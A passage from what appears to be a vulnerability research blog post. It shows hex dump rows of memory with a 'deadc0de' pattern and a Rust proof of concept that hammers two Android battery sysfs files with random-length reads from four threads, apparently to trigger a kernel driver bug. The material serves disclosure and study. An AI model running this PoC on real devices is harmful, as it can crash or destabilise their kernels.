0290 deadc0de a8c14bf0 d61f0020 a9bf4bf0 b85fc050 716f9e10 712eb61f 54000040
02b0 deadc0de a8c14bf0 d61f0040 a9bf4bf0 b85fc070 716f9e10 712eb61f 54000040
02d0 deadc0de a8c14bf0 d61f0060 a9bf4bf0 b85fc090 716f9e10 712eb61f 54000040
02f0 deadc0de a8c14bf0 d61f0080 a9bf4bf0 b85fc0b0 716f9e10 712eb61f 54000040
0310 deadc0de a8c14bf0 d61f00a0 a9bf4bf0 b85fc0d0 716f9e10 712eb61f 54000040
</code></pre></div></div>
<p><strong>PoC</strong></p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">extern</span> <span class="n">crate</span> <span class="n">rand</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="n">File</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">io</span><span class="p">::</span><span class="n">Read</span><span class="p">;</span>
<span class="k">fn</span> <span class="nf">thrasher</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// These are the 2 files we want to fuzz</span>
<span class="k">let</span> <span class="n">random_paths</span> <span class="o">=</span> <span class="p">[</span>
<span class="s">"/sys/devices/platform/battery/power_supply/battery/mst_switch_test"</span><span class="p">,</span>
<span class="s">"/sys/devices/platform/battery/power_supply/battery/batt_wireless_firmware_update"</span>
<span class="p">];</span>
<span class="c">// Buffer to read into</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">buf</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0x41u8</span><span class="p">;</span> <span class="mi">8192</span><span class="p">];</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="c">// Pick a random file</span>
<span class="k">let</span> <span class="n">file</span> <span class="o">=</span> <span class="o">&</span><span class="n">random_paths</span><span class="p">[</span><span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">random_paths</span><span class="nf">.len</span><span class="p">()];</span>
<span class="c">// Read a random number of bytes from the file</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="nn">File</span><span class="p">::</span><span class="nf">open</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">rsz</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="p">(</span><span class="n">buf</span><span class="nf">.len</span><span class="p">()</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.read</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">buf</span><span class="p">[</span><span class="o">..</span><span class="n">rsz</span><span class="p">]);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Make fuzzing threads</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">threads</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="k">for</span> <span class="mi">_</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="mi">4</span> <span class="p">{</span>
<span class="n">threads</span><span class="nf">.push</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">thread</span><span class="p">::</span><span class="nf">spawn</span><span class="p">(</span><span class="k">move</span> <span class="p">||</span> <span class="nf">thrasher</span><span class="p">()));</span>
<span class="p">}</span>
<span class="c">// Wait for all threads to exit</span>
<span class="k">for</span> <span class="n">thr</span> <span class="n">in</span> <span class="n">threads</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">thr</span><span class="nf">.join</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>So slimy it belongs in the slime tree